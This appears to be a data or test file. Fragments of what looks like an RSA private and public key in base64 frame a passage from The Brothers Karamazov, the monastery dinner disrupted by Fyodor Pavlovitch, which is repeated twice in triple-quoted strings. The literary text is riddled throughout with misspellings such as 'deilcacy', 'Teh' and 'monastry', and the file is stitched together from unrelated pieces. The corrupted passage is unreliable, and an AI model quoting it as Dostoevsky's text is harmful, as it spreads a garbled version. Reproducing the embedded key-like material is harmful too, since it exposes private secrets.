gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
